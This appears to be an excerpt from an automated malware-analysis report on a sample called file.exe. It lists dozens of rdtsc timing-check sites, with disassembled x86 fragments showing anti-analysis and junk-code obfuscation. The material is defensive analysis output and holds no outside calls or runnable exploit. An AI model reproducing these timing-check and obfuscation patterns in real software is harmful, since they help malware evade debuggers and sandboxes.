                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049678 second address: 10496C4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8114E11BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c adc bx, 5891h 0x00000011 push 00000000h 0x00000013 xor di, B100h 0x00000018 push 00000000h 0x0000001a call 00007F8114E11BEBh 0x0000001f push edi 0x00000020 xor bl, 00000071h 0x00000023 pop ebx 0x00000024 pop edi 0x00000025 push eax 0x00000026 pushad 0x00000027 jmp 00007F8114E11BEDh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F8114E11BF0h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10488C7 second address: 10488D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8114B92466h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10496C4 second address: 10496C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048983 second address: 1048988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048988 second address: 104898D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AA62 second address: 104AA6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F8114B92466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C910 second address: 104C915 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C915 second address: 104C929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F8114B92466h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C929 second address: 104C92F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C92F second address: 104C97F instructions: 0x00000000 rdtsc 0x00000002 je 00007F8114B9246Ch 0x00000008 jbe 00007F8114B92466h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F8114B92468h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b xor dword ptr [ebp+122D3417h], edx 0x00000031 push ecx 0x00000032 mov dword ptr [ebp+122D2BC9h], edi 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b or ebx, 6A189E00h 0x00000041 push 00000000h 0x00000043 adc di, C4CBh 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C97F second address: 104C985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D862 second address: 104D90B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F8114B9246Eh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F8114B92468h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov bl, 88h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F8114B92468h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b jmp 00007F8114B92479h 0x00000050 stc 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 js 00007F8114B9247Ch 0x0000005a jmp 00007F8114B92476h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D90B second address: 104D911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E983 second address: 104E988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DA80 second address: 104DA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DA86 second address: 104DB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F8114B92468h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push esi 0x0000002d jbe 00007F8114B9246Ah 0x00000033 mov di, D401h 0x00000037 pop ebx 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jnp 00007F8114B92476h 0x00000045 jmp 00007F8114B92470h 0x0000004a mov eax, dword ptr [ebp+122D1365h] 0x00000050 push 00000000h 0x00000052 push ebp 0x00000053 call 00007F8114B92468h 0x00000058 pop ebp 0x00000059 mov dword ptr [esp+04h], ebp 0x0000005d add dword ptr [esp+04h], 0000001Ah 0x00000065 inc ebp 0x00000066 push ebp 0x00000067 ret 0x00000068 pop ebp 0x00000069 ret 0x0000006a mov ebx, edx 0x0000006c push FFFFFFFFh 0x0000006e jp 00007F8114B92468h 0x00000074 mov ebx, eax 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DB17 second address: 104DB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8114E11BE6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DB22 second address: 104DB4F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8114B92472h 0x00000008 jmp 00007F8114B9246Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F8114B9246Dh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DB4F second address: 104DB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F973 second address: 104FA19 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F8114B92468h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov di, si 0x0000002b xor di, D964h 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jns 00007F8114B92482h 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov ebx, dword ptr [ebp+122D388Eh] 0x0000004a mov eax, dword ptr [ebp+122D1771h] 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push ebx 0x00000055 call 00007F8114B92468h 0x0000005a pop ebx 0x0000005b mov dword ptr [esp+04h], ebx 0x0000005f add dword ptr [esp+04h], 00000019h 0x00000067 inc ebx 0x00000068 push ebx 0x00000069 ret 0x0000006a pop ebx 0x0000006b ret 0x0000006c movsx ebx, cx 0x0000006f sub dword ptr [ebp+122D1A9Fh], edx 0x00000075 nop 0x00000076 push edi 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FA19 second address: 104FA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114E11BF6h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8114E11BEBh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052A75 second address: 1052A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052A7B second address: 1052A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10547E4 second address: 10547FE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8114B9246Ch 0x00000008 jc 00007F8114B92466h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 je 00007F8114B92470h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052A7F second address: 1052B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, 159174CFh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 xor edi, dword ptr [ebp+12474BF2h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov ebx, dword ptr [ebp+122D5936h] 0x0000002a mov eax, dword ptr [ebp+122D0715h] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F8114E11BE8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D2CC0h], ebx 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push edi 0x00000055 call 00007F8114E11BE8h 0x0000005a pop edi 0x0000005b mov dword ptr [esp+04h], edi 0x0000005f add dword ptr [esp+04h], 00000014h 0x00000067 inc edi 0x00000068 push edi 0x00000069 ret 0x0000006a pop edi 0x0000006b ret 0x0000006c mov ebx, edx 0x0000006e nop 0x0000006f jmp 00007F8114E11BEBh 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052B03 second address: 1052B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052B09 second address: 1052B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10570CA second address: 10570CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10570CE second address: 10570E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8114E11BEBh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F987 second address: 105F9AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B92476h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F8114B9246Ch 0x00000011 js 00007F8114B92466h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9AF second address: 105F9B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9B8 second address: 105F9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jp 00007F8114B92466h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jg 00007F8114B92466h 0x00000017 jmp 00007F8114B9246Ah 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9E2 second address: 105F9E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9E6 second address: 105F9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9F0 second address: 105F9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9F6 second address: 105F9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064D97 second address: 1064D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064D9E second address: 1064DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F8114B92466h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10674AF second address: 10674B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10674B3 second address: 10674B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10674B9 second address: 10674F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8114E11BECh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F8114E11BEDh 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8114E11BEBh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10675FC second address: 1067617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8114B92476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068A20 second address: 1068A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068A25 second address: 1068A42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B92478h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DC55 second address: 106DC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DC5B second address: 106DC90 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8114B92466h 0x00000008 jmp 00007F8114B92471h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jmp 00007F8114B92477h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFCE86 second address: FFCE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFCE8A second address: FFCE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFCE8E second address: FFCEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114E11BF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C94E second address: 106C964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8114B9246Bh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C964 second address: 106C96B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C96B second address: 106C971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C971 second address: 106C977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D08E second address: 106D096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D1F0 second address: 106D203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jno 00007F8114E11BEAh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D203 second address: 106D207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D32D second address: 106D35C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8114E11BF9h 0x00000012 popad 0x00000013 js 00007F8114E11BECh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DAB8 second address: 106DAF6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8114B92479h 0x00000011 jmp 00007F8114B92479h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070FD6 second address: 1070FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070FE1 second address: 1071002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F8114B92466h 0x00000009 jmp 00007F8114B92476h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071002 second address: 107100B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076944 second address: 107694A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107694A second address: 107694E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107540C second address: 107541B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8114B92466h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107541B second address: 1075421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075589 second address: 107558D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107558D second address: 10755A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8114E11BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F8114E11BE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075892 second address: 10758A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F8114B9246Eh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075B3E second address: 1075B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075B42 second address: 1075B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8114B92471h 0x0000000e jmp 00007F8114B92479h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075F9D second address: 1075FDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BF5h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F8114E11BEDh 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F8114E11BEFh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075FDC second address: 1075FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10271D8 second address: 10271DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10271DE second address: 10271FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8114B92478h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10271FC second address: 1027210 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8114E11BEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027210 second address: 102724D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B92479h 0x00000007 jmp 00007F8114B9246Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8114B92470h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102724D second address: 1027251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9A04 second address: FF9A09 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C047 second address: 107C04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C04D second address: 107C056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103CB71 second address: 102665F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8114E11BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F8114E11BF0h 0x00000010 nop 0x00000011 xor edi, dword ptr [ebp+122D5931h] 0x00000017 call dword ptr [ebp+122D2BFFh] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8114E11BF4h 0x00000024 push edi 0x00000025 jc 00007F8114E11BE6h 0x0000002b pop edi 0x0000002c rdtsc
